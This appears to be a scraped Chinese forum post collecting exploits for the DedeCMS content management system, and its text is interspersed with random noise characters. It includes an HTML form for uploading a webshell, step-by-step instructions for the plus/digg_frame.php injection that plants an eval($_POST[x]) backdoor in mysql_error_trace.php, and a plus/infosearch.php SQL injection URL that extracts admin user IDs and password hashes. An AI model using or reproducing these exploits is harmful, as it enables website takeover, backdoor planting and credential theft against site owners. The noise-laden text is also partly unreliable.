<input type='hidden' name='job' value='upload' />. l5 {. a# g  G* K: Z
<input type='hidden' name='newname' value='fly.php' />. e8 w& W' Q, h) R6 c1 q
Select U Shell <input type='file' name='uploadfile' size='25' />/ _# ^; `0 Y" j% j) E
<input type='submit' name='sb1' value='确定' />$ ^5 v) H& B. C8 G
</form>/ N' F/ D/ F9 v! r, s, B) \; ~; b; J3 `8 O
<br />It's just a exp for the bug of Dedecms V55...<br />: @& _% ?- i: Z3 f
Need register_globals = on...<br />
% X8 C1 `) ]: DFun the game,get a webshell at /data/cache/fly.php...<br />5 r! N- D0 |" J: N- n2 S  n4 P* C, J
</body>
& |7 s9 q- A* F/ V5 X</html>6 m& c6 N. h8 b4 k+ N

; G2 ]$ X5 s, A. }+ T/ Q1 R" Y* q1 p* c: G& ^9 ]1 {5 H$ E5 V1 ]* d
# i1 X) T- B; n, j  z1 ]  r( d' `

, p. a/ `7 d, F8 ]/ |3 [9 }- {, H0 ^  R2 {

% B% M7 l" e: r! ]8 J, g' M# R8 D3 T, l# T; O  D" H/ m( A

9 [" [, U/ i. x3 K8 G) t; G) W* x1 s8 k2 s4 m" k
5 ?! y' r. ^+ K$ Z6 ?: u9 H
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
- c7 B8 G% [4 \  E利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。; s+ i5 u: a. q, m
1. 访问网址：: p6 i) r' G& b1 F5 O3 Q
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>( s: |5 ]9 H0 @( k
可看见错误信息
) P7 X0 V3 X2 b5 w+ \# l! X$ V* a! Z; x  Y* e( a. m$ v; H

0 `1 U( ^: @$ d" S( Q3 o$ W1 s2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
) j& [# D& t) C8 b1 L, v$ P) Uint(3) Error: Illegal double '1024e1024' value found during parsing
5 R  h# `  E8 v7 QError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
* M% G5 K" d. j$ F5 P; i) X
  V# f- b- T, \5 D; d
* K  a7 _1 ^' S3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
9 M7 s4 M4 N/ h
0 U0 P' Y# O$ N5 i  S/ Z# q) }& i- E- ^/ S$ H% H
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
* T7 o+ N! A3 J. X$ r9 w: f$ `6 Y9 t  g$ x* L

" x" s4 @) t# _) Z按确定后的看到第2步骤的信息表示文件木马上传成功.0 D$ B2 `7 K) `8 Y/ S
$ j) w4 [4 J9 S9 P$ O( F6 _* _9 N
, K* T% m6 x5 P+ D9 E! v

) a3 r( `; B& |2 t0 R" ^/ n
7 I: z6 T, j- K1 Q+ y4 C
$ [4 R0 v$ q" m7 F8 S9 p
) q* ]- ]4 c% H2 @6 {8 p
7 Y! Y  _- ]: T: c
: B8 q( S, g) t% Y5 X: q  P/ ]+ \' X2 u$ t7 Z, N5 I

& u0 D4 |6 {9 H) q: f; E  [
- }) W6 Z: E7 R2 W% L6 h. b( P4 Q$ h+ Z
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
1 W" N" f" z1 k# Bhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册

dedecms漏洞总结

浏览过的版块